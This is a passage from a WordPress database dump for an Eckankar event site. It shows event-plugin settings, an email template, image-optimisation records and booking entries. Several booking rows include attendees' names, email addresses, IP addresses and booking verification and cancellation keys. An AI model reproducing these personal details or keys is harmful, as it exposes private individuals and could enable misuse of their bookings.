50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(165187,266820,'mec_event_status','EventScheduled'),(165188,266820,'mec_moved_online_link',''),(165189,266820,'mec_cancelled_reason',''),(165190,266820,'mec_display_cancellation_reason_in_single_page',''),(165191,266820,'protect_children',''),(165192,266820,'passster_activate_global_protection',NULL),(165193,266820,'passster_activate_protection',NULL),(165194,266820,'passster_protection_type','password'),(165195,266820,'boldgrid_hide_page_title','0'),(165196,266820,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(165197,266820,'boldgrid_in_page_containers','1'),(165201,266820,'_dp_original','266540'),(165199,266820,'_thumbnail_id','266821'),(165200,266820,'_wp_old_date','2022-04-30'),(165202,266820,'_edit_lock','1655870111:2'),(165203,266820,'_edit_last','2'),(165204,266821,'_wp_attached_file','2022/06/machu-pichu-3.jpg'),(165205,266821,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:751;s:6:\"height\";i:423;s:4:\"file\";s:25:\"2022/06/machu-pichu-3.jpg\";s:8:\"filesize\";i:125409;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"machu-pichu-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21285;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"machu-pichu-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10631;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"machu-pichu-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35336;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"machu-pichu-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56285;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"machu-pichu-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39382;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"machu-pichu-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42968;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(165206,266822,'mec_transaction_id','VZC41276'),(165207,266822,'mec_user_id','1000021'),(165208,266822,'mec_verified','1'),(165209,266822,'mec_verification_key','c6877cd1f47ca0363542dcc422c8f909'),(165210,266822,'mec_cancellation_key','39c7add1b70f6729be57e1316f7c7be3'),(165211,266822,'mec_confirmed','1'),(165212,266822,'mec_event_id','266820'),(165213,266822,'mec_date','1657449000:1657495800'),(165214,266822,'mec_ticket_id',',1,'),(165215,266822,'mec_booking_time','2022-06-21 21:45:00'),(165216,266822,'mec_all_dates','a:0:{}'),(165217,266822,'mec_other_dates','a:0:{}'),(165218,266822,'mec_attention_time','1657449000:1657495800'),(165219,266822,'mec_attention_time_start','1657449000'),(165220,266822,'mec_attention_time_end','1657495800'),(165221,266822,'mec_book_date_submit','20220621214500'),(165222,266822,'mec_booking_location','129'),(165223,266822,'mec_ticket_price_1','0'),(165224,266822,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:9:\"ELSS Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(165225,266822,'mec_price','0'),(165226,266822,'mec_gateway','MEC_gateway_free'),(165227,266822,'mec_gateway_label','Free'),(165228,266818,'original-file','2022/06/sound-of-soul-2-updraft-pre-smush-original.jpg'),(165229,266818,'smush-complete','1'),(165230,266818,'smush-info','The file was compressed from 60.10 KB to 57.71 KB saving 3.97 percent using WP-Optimize'),(165231,266818,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:61540;s:12:\"smushed-size\";i:59094;s:15:\"savings-percent\";d:3.97;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:61540;s:10:\"compressed\";i:59094;}s:6:\"medium\";a:2:{s:8:\"original\";i:16030;s:10:\"compressed\";i:16030;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9038;s:10:\"compressed\";i:8972;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:23177;s:10:\"compressed\";i:23177;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:33296;s:10:\"compressed\";i:33296;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:25247;s:10:\"compressed\";i:25230;}s:8:\"tileview\";a:2:{s:8:\"original\";i:26374;s:10:\"compressed\";i:26321;}}}'),(165232,266821,'original-file','2022/06/machu-pichu-3-updraft-pre-smush-original.jpg'),(165233,266821,'smush-complete','1'),(165234,266821,'smush-info','The file was compressed from 122.47 KB to 115.15 KB saving 5.97 percent using WP-Optimize'),(165235,266821,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:125409;s:12:\"smushed-size\";i:117918;s:15:\"savings-percent\";d:5.97;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:125409;s:10:\"compressed\";i:117918;}s:6:\"medium\";a:2:{s:8:\"original\";i:21285;s:10:\"compressed\";i:20563;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10631;s:10:\"compressed\";i:10341;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:35336;s:10:\"compressed\";i:33852;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:56285;s:10:\"compressed\";i:54096;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:39382;s:10:\"compressed\";i:37827;}s:8:\"tileview\";a:2:{s:8:\"original\";i:42968;s:10:\"compressed\";i:41319;}}}'),(165236,266816,'original-file','2022/06/hu-water-2-updraft-pre-smush-original.jpg'),(165237,266816,'smush-complete','1'),(165238,266816,'smush-info','The file was compressed from 59.10 KB to 56.72 KB saving 4.03 percent using WP-Optimize'),(165239,266816,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:60517;s:12:\"smushed-size\";i:58080;s:15:\"savings-percent\";d:4.03;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:60517;s:10:\"compressed\";i:58080;}s:6:\"medium\";a:2:{s:8:\"original\";i:11296;s:10:\"compressed\";i:11296;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5773;s:10:\"compressed\";i:5707;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16735;s:10:\"compressed\";i:16735;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:26899;s:10:\"compressed\";i:26899;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19429;s:10:\"compressed\";i:19429;}s:8:\"tileview\";a:2:{s:8:\"original\";i:22038;s:10:\"compressed\";i:22038;}}}'),(165240,266824,'mec_transaction_id','CFQ67977'),(165241,266824,'mec_user_id','1000031'),(165242,266824,'mec_verified','1'),(165243,266824,'mec_verification_key','95c32290f25ab63d546352bdd5552dc4'),(165244,266824,'mec_cancellation_key','01aeb66fdcffa3db72474f40534d981e'),(165245,266824,'mec_confirmed','1'),(165246,266824,'mec_event_id','266820'),(165247,266824,'mec_date','1657449000:1657495800'),(165248,266824,'mec_ticket_id',',1,'),(165249,266824,'mec_booking_time','2022-06-22 13:51:21'),(165250,266824,'mec_all_dates','a:0:{}'),(165251,266824,'mec_other_dates','a:0:{}'),(165252,266824,'mec_attention_time','1657449000:1657495800'),(165253,266824,'mec_attention_time_start','1657449000'),(165254,266824,'mec_attention_time_end','1657495800'),(165255,266824,'mec_book_date_submit','20220622135121'),(165256,266824,'mec_booking_location','129'),(165257,266824,'mec_ticket_price_1','0'),(165258,266824,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:26:\"laurahbrockyoung@gmail.com\";s:4:\"name\";s:18:\"Laurah Brock young\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"64.188.179.195\";}}'),(165259,266824,'mec_price','0'),(165260,266824,'mec_gateway','MEC_gateway_free'),(165261,266824,'mec_gateway_label','Free'),(168228,267092,'mec_cost',''),(168226,267092,'mec_more_info_title',''),(168224,267092,'mec_read_more',''),(168225,267092,'mec_more_info',''),(166946,266942,'_edit_last','2'),(166945,266942,'_edit_lock','1694414965:2'),(166920,266934,'smush-info','The file was compressed from 75.29 KB to 75.29 KB saving 0 percent using WP-Optimize'),(166921,266934,'smush-complete','1'),(166922,266934,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:77094;s:12:\"smushed-size\";i:77094;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:1:{s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8936;s:10:\"compressed\";i:4571;}}}'),(188226,268837,'mec_moved_online_link',''),(188225,268837,'mec_event_status','EventScheduled'),(166925,266906,'smush-info','Failed with error code http_request_failed - Missing header/body separator'),(166918,266934,'_wp_attached_file','2022/07/satsang-reg-bk1-sm.jpg'),(166919,266934,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:770;s:6:\"height\";i:434;s:4:\"file\";s:30:\"2022/07/satsang-reg-bk1-sm.jpg\";s:8:\"filesize\";i:77094;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"satsang-reg-bk1-sm-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15208;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"satsang-reg-bk1-sm-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8936;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"satsang-reg-bk1-sm-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57607;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"satsang-reg-bk1-sm-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18211;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:30:\"satsang-reg-bk1-sm-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30272;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"satsang-reg-bk1-sm-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22764;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"satsang-reg-bk1-sm-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19798;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166926,266906,'smush-complete',''),(166927,266907,'smush-info','Failed with error code http_request_failed - cURL error 55: Send failure: Broken pipe'),(166928,266907,'smush-complete',''),(166929,266908,'smush-info','Failed with error code http_request_failed - cURL error 28: Operation timed out after 30003 milliseconds with 0 bytes received'),(166930,266908,'smush-complete',''),(166931,266889,'smush-info','Failed with error code http_request_failed - Missing header/body separator'),(166933,266942,'protect_children',''),(166934,266942,'_wp_page_template','default'),(166932,266889,'smush-complete',''),(168219,267092,'protect_children',''),(166935,266942,'passster_activate_protection',NULL),(166936,266942,'passster_protection_type','password'),(166937,266942,'boldgrid_hide_page_title','0'),(166938,266942,'boldgrid_in_page_containers','1'),(166939,266942,'bgseo_robots_index','index'),(166940,266942,'bgseo_robots_follow','follow'),(166944,266942,'_dp_original','265598'),(166942,266942,'passster_activate_global_protection',NULL),(166943,266942,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(168222,267092,'mec_dont_show_map','0'),(168223,267092,'mec_organizer_id','1'),(193690,269203,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(193691,269203,'_field_649',''),(165333,266826,'protect_children',''),(165334,266826,'mec_color',''),(165335,266826,'mec_location_id','131'),(165336,266826,'mec_dont_show_map','0'),(165337,266826,'mec_organizer_id','1'),(165338,266826,'mec_start_date','2022-07-10'),(165339,266826,'mec_start_time_hour','1'),(165340,266826,'mec_start_time_minutes','0'),(165341,266826,'mec_start_time_ampm','PM'),(165342,266826,'mec_start_day_seconds','46800'),(165343,266826,'mec_end_date','2022-07-10'),(165344,266826,'mec_end_time_hour','2'),(165345,266826,'mec_end_time_minutes','30'),(165346,266826,'mec_end_time_ampm','PM'),(165347,266826,'mec_end_day_seconds','52200'),(165348,266826,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-10\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-10\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165349,266826,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165350,266826,'mec_certain_weekdays','a:0:{}'),(165351,266826,'mec_allday','0'),(165352,266826,'mec_hide_time','0'),(165353,266826,'mec_hide_end_time','0'),(165354,266826,'mec_comment',''),(165355,266826,'mec_repeat_status','0'),(165356,266826,'mec_repeat_type',''),(165357,266826,'mec_repeat_interval','1'),(165358,266826,'mec_repeat_end',''),(165359,266826,'mec_repeat_end_at_occurrences',''),(165360,266826,'mec_repeat_end_at_date',''),(165361,266826,'mec_advanced_days','a:0:{}'),(165362,266826,'mec_in_days',''),(165363,266826,'mec_not_in_days',''),(165364,266826,'mec_hourly_schedules','a:0:{}'),(165365,266826,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165366,266826,'mec_tickets','a:0:{}'),(165367,266826,'mec_fees_global_inheritance','1'),(165368,266826,'mec_fees','a:0:{}'),(165369,266826,'mec_ticket_variations_global_inheritance','1'),(165370,266826,'mec_ticket_variations','a:0:{}'),(165371,266826,'mec_reg_fields_global_inheritance','1'),(165372,266826,'mec_reg_fields','a:0:{}'),(165373,266826,'mec_op','a:0:{}'),(165374,266826,'mec_event_date_submit','20210422105713'),(165375,266826,'mec_read_more',''),(165376,266826,'mec_more_info',''),(165377,266826,'mec_more_info_title',''),(165378,266826,'mec_more_info_target','_self'),(165379,266826,'mec_cost',''),(165380,266826,'mec_currency','a:0:{}'),(165381,266826,'mec_additional_organizer_ids','a:0:{}'),(165382,266826,'mec_additional_location_ids','a:0:{}'),(165383,266826,'one_occurrence','0'),(165384,266826,'mec_timezone','global'),(165385,266826,'mec_countdown_method','global'),(165386,266826,'mec_public','1'),(165387,266826,'mec_bfixed_fields','a:0:{}'),(165388,266826,'mec_fields','a:0:{}'),(165389,266826,'mec_event_status','EventScheduled'),(165390,266826,'mec_moved_online_link',''),(165391,266826,'mec_cancelled_reason',''),(165392,266826,'mec_display_cancellation_reason_in_single_page',''),(165393,266826,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(165394,266826,'passster_activate_global_protection',NULL),(165395,266826,'passster_activate_protection',NULL),(165396,266826,'passster_protection_type','password'),(165397,266826,'_wp_old_date','2022-01-18'),(165398,266826,'boldgrid_in_page_containers','1'),(165399,266826,'_dp_original','265425'),(165400,266826,'_edit_lock','1655934502:2'),(165401,266826,'_edit_last','2'),(165402,266827,'protect_children',''),(165403,266827,'mec_color',''),(165404,266827,'mec_location_id','122'),(165405,266827,'mec_dont_show_map','0'),(165406,266827,'mec_organizer_id','1'),(165407,266827,'mec_start_date','2022-01-06'),(165408,266827,'mec_start_time_hour','8'),(165409,266827,'mec_start_time_minutes','0'),(165410,266827,'mec_start_time_ampm','AM'),(165411,266827,'mec_start_day_seconds','28800'),(165412,266827,'mec_end_date','2022-01-06'),(165413,266827,'mec_end_time_hour','6'),(165414,266827,'mec_end_time_minutes','0'),(165415,266827,'mec_end_time_ampm','PM'),(165416,266827,'mec_end_day_seconds','64800'),(165417,266827,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-06\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-06\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(165418,266827,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(165419,266827,'mec_certain_weekdays','a:0:{}'),(165420,266827,'mec_allday','0'),(165421,266827,'mec_hide_time','0'),(165422,266827,'mec_hide_end_time','0'),(165423,266827,'mec_comment',''),(165424,266827,'mec_repeat_status','0'),(165425,266827,'mec_repeat_type',''),(165426,266827,'mec_repeat_interval','1'),(165427,266827,'mec_repeat_end',''),(165428,266827,'mec_repeat_end_at_occurrences',''),(165429,266827,'mec_repeat_end_at_date',''),(165430,266827,'mec_advanced_days','a:0:{}'),(165431,266827,'mec_in_days',''),(165432,266827,'mec_not_in_days',''),(165433,266827,'mec_hourly_schedules','a:0:{}'),(165434,266827,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(165435,266827,'mec_tickets','a:0:{}'),(165436,266827,'mec_fees_global_inheritance','1'),(165437,266827,'mec_fees','a:0:{}'),(165438,266827,'mec_ticket_variations_global_inheritance','1'),(165439,266827,'mec_ticket_variations','a:0:{}'),(165440,266827,'mec_reg_fields_global_inheritance','1'),(165441,266827,'mec_reg_fields','a:0:{}'),(165442,266827,'mec_op','a:0:{}'),(165443,266827,'mec_event_date_submit','20210422105713'),(165444,266827,'mec_read_more',''),(165445,266827,'mec_more_info',''),(165446,266827,'mec_more_info_title',''),(165447,266827,'mec_more_info_target','_self'),(165448,266827,'mec_cost',''),(165449,266827,'mec_currency','a:0:{}'),(165450,266827,'mec_additional_organizer_ids','a:0:{}'),(165451,266827,'mec_additional_location_ids','a:0:{}'),(165452,266827,'one_occurrence','0'),(165453,266827,'mec_timezone','global'),(165454,266827,'mec_countdown_method','global'),(165455,266827,'mec_public','1'),(165456,266827,'mec_bfixed_fields','a:0:{}'),(165457,266827,'mec_fields','a:0:{}'),(165458,266827,'mec_event_status','EventScheduled'),(165459,266827,'mec_moved_online_link',''),(165460,266827,'mec_cancelled_reason',''),(165461,266827,'mec_display_cancellation_reason_in_single_page',''),(165462,266827,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(165463,266827,'passster_activate_global_protection',NULL),(165464,266827,'passster_activate_protection',NULL),(165465,266827,'passster_protection_type','password'),(165466,266827,'_wp_old_date','2022-01-18'),(165467,266827,'boldgrid_in_page_containers','1'),(165468,266827,'_dp_original','265425'),(165469,266827,'_edit_lock','1693507387:2'),(165470,266827,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(165471,266827,'_edit_last','2'),(165472,266826,'_thumbnail_id','266720'),(165473,266829,'protect_children',''),(165474,266829,'mec_color',''),(165475,266829,'mec_location_id','118'),(165476,266829,'mec_dont_show_map','0'),(165477,266829,'mec_organizer_id','1'),(165478,266829,'mec_read_more',''),(165479,266829,'mec_more_info',''),(165480,266829,'mec_more_info_title',''),(165481,266829,'mec_more_info_target','_self'),(165482,266829,'mec_cost',''),(165483,266829,'mec_currency','a:0:{}'),(165484,266829,'mec_additional_organizer_ids','a:0:{}'),(165485,266829,'mec_additional_location_ids','a:0:{}'),(165486,266829,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-07-06\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-07-06\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6: